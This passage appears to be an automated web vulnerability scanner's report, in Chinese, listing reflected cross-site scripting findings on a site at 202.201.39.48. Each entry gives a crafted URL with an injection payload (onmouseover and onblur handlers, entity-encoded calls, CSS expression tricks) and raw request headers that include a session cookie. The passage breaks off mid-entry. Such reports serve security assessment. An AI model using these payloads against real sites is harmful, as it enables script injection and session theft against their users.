  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.html

URL http://202.201.39.48/index.php/article/c17/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17/p2.html;'%20onmouseover=%22dfbhmg(6675)%22%3e%20var=%20
2、设置参数 '%20onmouseover=%22dfbhmg(6675)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6675)
请求&响应 GET /index.php/article/c17/p2.html;'%20onmouseover=%22dfbhmg(6675)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.html

URL http://202.201.39.48/index.php/article/c17/p2.html
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17/p2.html'%20style=dfbhmg:expre/**/ssion(dfbhmg(6212))%20var=%20
2、设置参数 '%20style=dfbhmg:expre/**/ssion(dfbhmg(6212))%20var=%20
3、在响应头及响应内容中匹配: style.*?dfbhmg:expre/**/ssion(dfbhmg(6212))
请求&响应 GET /index.php/article/c17/p2.html'%20style=dfbhmg:expre/**/ssion(dfbhmg(6212))%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.html

URL http://202.201.39.48/index.php/article/19.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/19'%20onmouseover=dfbhmg(6152)%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6152)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6152)
请求&响应 GET /index.php/article/19'%20onmouseover=dfbhmg(6152)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/19.html

URL http://202.201.39.48/index.php/article/c23.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c23.mhtml?'%20onmouseover=dfbhmg(6700)%20
2、设置参数 '%20onmouseover=dfbhmg(6700)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6700)
请求&响应 GET /index.php/article/c23.mhtml?'%20onmouseover=dfbhmg(6700)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c23.html

URL http://202.201.39.48/index.php/article/c23.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c23.mhtml?var='%20onmouseover=dfbhmg(6193)%20var=%20
2、设置参数 var'%20onmouseover=dfbhmg(6193)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6193)
请求&响应 GET /index.php/article/c23.mhtml?var='%20onmouseover=dfbhmg(6193)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c23.html

URL http://202.201.39.48/index.php/search-index-atestu-1.html
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/search-index-atestu-"%20onmouseover=%22dfbhmg(6359)%22%3e%20.html
2、设置参数 value0"%20onmouseover=%22dfbhmg(6359)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6359)
请求&响应 GET /index.php/search-index-atestu-"%20onmouseover=%22dfbhmg(6359)%22%3e%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/search-index-atestu-1.mhtml

URL http://202.201.39.48/index.php/article/c37/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37/p2.mhtml?'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x35;%26%23x32;%26%23x29;%20
2、设置参数 '%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x35;%26%23x32;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6052)
请求&响应 GET /index.php/article/c37/p2.mhtml?'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x30;%26%23x35;%26%23x32;%26%23x29;%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.mhtml

URL http://202.201.39.48/index.php/article/c37/p2.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37/p2.mhtml?var='%20onmouseover=dfbhmg(6111)%20
2、设置参数 var'%20onmouseover=dfbhmg(6111)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6111)
请求&响应 GET /index.php/article/c37/p2.mhtml?var='%20onmouseover=dfbhmg(6111)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.mhtml

URL http://202.201.39.48/index.php/article/c37/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37/p2.mhtml/'%20onmouseover=%22dfbhmg(6880)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6880)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6880)
请求&响应 GET /index.php/article/c37/p2.mhtml/'%20onmouseover=%22dfbhmg(6880)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.mhtml

URL http://202.201.39.48/index.php/article/c37/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37/p2.mhtml;'%20onmouseover=%22dfbhmg(6407)%22%3e%20
2、设置参数 '%20onmouseover=%22dfbhmg(6407)%22%3e%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6407)
请求&响应 GET /index.php/article/c37/p2.mhtml;'%20onmouseover=%22dfbhmg(6407)%22%3e%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.mhtml

URL http://202.201.39.48/index.php/article/c37/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c37/p2.mhtml'%20onmouseover=dfbhmg(6567)%20
2、设置参数 '%20onmouseover=dfbhmg(6567)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6567)
请求&响应 GET /index.php/article/c37/p2.mhtml'%20onmouseover=dfbhmg(6567)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c37.mhtml

URL http://202.201.39.48/index.php/message-comment-article-26.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x37;%26%23x32;%26%23x29;%20.mhtml
2、设置参数 value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x37;%26%23x32;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6872)
请求&响应 GET /index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x38;%26%23x37;%26%23x32;%26%23x29;%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/26.mhtml

URL http://202.201.39.48/index.php/page/18.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/page/"%20onmouseover=dfbhmg(6949)%20var=%20.mhtml
2、设置参数 value0"%20onmouseover=dfbhmg(6949)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6949)
请求&响应 GET /index.php/page/"%20onmouseover=dfbhmg(6949)%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/sitemap.xml

URL http://202.201.39.48/index.php/article/37.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/37'%20onmouseover=dfbhmg(6271)%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6271)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6271)
请求&响应 GET /index.php/article/37'%20onmouseover=dfbhmg(6271)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/sitemap.xml

URL http://202.201.39.48/index.php/article/22.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/22'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x32;%26%23x36;%26%23x29;%20.mhtml
2、设置参数 value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x32;%26%23x36;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6126)
请求&响应 GET /index.php/article/22'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x31;%26%23x32;%26%23x36;%26%23x29;%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/sitemap.xml

URL http://202.201.39.48/index.php/message-comment-article-27.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6585)%22%3e%20var=%20.mhtml
2、设置参数 value0'%20onmouseover=%22dfbhmg(6585)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6585)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=%22dfbhmg(6585)%22%3e%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/27.mhtml

URL http://202.201.39.48/index.php/message-comment-article-20.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6663)%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6663)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6663)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6663)%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/20.mhtml

URL http://202.201.39.48/index.php/message-comment-article-36.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x34;%26%23x37;%26%23x31;%26%23x29;%20.mhtml
2、设置参数 value0'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x34;%26%23x37;%26%23x31;%26%23x29;%20
3、在响应头及响应内容中匹配: onblur.*?dfbhmg(6471)
请求&响应 GET /index.php/message-comment-article-'%20onblur=%26%23x64;%26%23x66;%26%23x62;%26%23x68;%26%23x6d;%26%23x67;%26%23x28;%26%23x36;%26%23x34;%26%23x37;%26%23x31;%26%23x29;%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/36.mhtml

URL http://202.201.39.48/index.php/message-comment-article-24.mhtml
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/message-comment-article-'%20onmouseover=dfbhmg(6172)%20var=%20.mhtml
2、设置参数 value0'%20onmouseover=dfbhmg(6172)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6172)
请求&响应 GET /index.php/message-comment-article-'%20onmouseover=dfbhmg(6172)%20var=%20.mhtml HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/24.mhtml

URL http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html
请求方式 GET
问题参数 value0
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/user-deny-product-"%20onmouseover=dfbhmg(6053)%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html
2、设置参数 value0"%20onmouseover=dfbhmg(6053)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6053)
请求&响应 GET /index.php/user-deny-product-"%20onmouseover=dfbhmg(6053)%20var=%20-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/c7.html

URL http://202.201.39.48/index.php/user-deny-product-browse-aHR0cDovLzIwMi4yMDEuMzkuNDgvaW5kZXgucGhwL3NpdGVtYXAv.html
请求方式 GET
问题参数 value1
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/user-deny-product-browse-"%20onmouseover=dfbhmg(6387)%20var=%20.html
2、设置参数 value1"%20onmouseover=dfbhmg(6387)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6387)
请求&响应 GET /index.php/user-deny-product-browse-"%20onmouseover=dfbhmg(6387)%20var=%20.html HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/product/c7.html

URL http://202.201.39.48/index.php/article/c17/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17/p2.mhtml?'%20onmouseover=dfbhmg(6489)%20var=%20
2、设置参数 '%20onmouseover=dfbhmg(6489)%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6489)
请求&响应 GET /index.php/article/c17/p2.mhtml?'%20onmouseover=dfbhmg(6489)%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.mhtml

URL http://202.201.39.48/index.php/article/c17/p2.mhtml
请求方式 GET
问题参数 var
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17/p2.mhtml?var='%20onmouseover=dfbhmg(6886)%20
2、设置参数 var'%20onmouseover=dfbhmg(6886)%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6886)
请求&响应 GET /index.php/article/c17/p2.mhtml?var='%20onmouseover=dfbhmg(6886)%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.mhtml

URL http://202.201.39.48/index.php/article/c17/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17/p2.mhtml/'%20onmouseover=%22dfbhmg(6724)%22%3e%20var=%20
2、设置参数 '%20onmouseover=%22dfbhmg(6724)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6724)
请求&响应 GET /index.php/article/c17/p2.mhtml/'%20onmouseover=%22dfbhmg(6724)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: theme=default;frontsid=jduk2i1vfl672lf5nscej19si3;frontLang=zh-cn
  • Referer: http://202.201.39.48/index.php/article/c17.mhtml

URL http://202.201.39.48/index.php/article/c17/p2.mhtml
请求方式 GET
问题参数
判断标准 1、修改指定参数为构造的xss特殊字符;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/index.php/article/c17/p2.mhtml;'%20onmouseover=%22dfbhmg(6065)%22%3e%20var=%20
2、设置参数 '%20onmouseover=%22dfbhmg(6065)%22%3e%20var=%20
3、在响应头及响应内容中匹配: onmouseover.*?dfbhmg(6065)
请求&响应 GET /index.php/article/c17/p2.mhtml;'%20onmouseover=%22dfbhmg(6065)%22%3e%20var=%20 HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
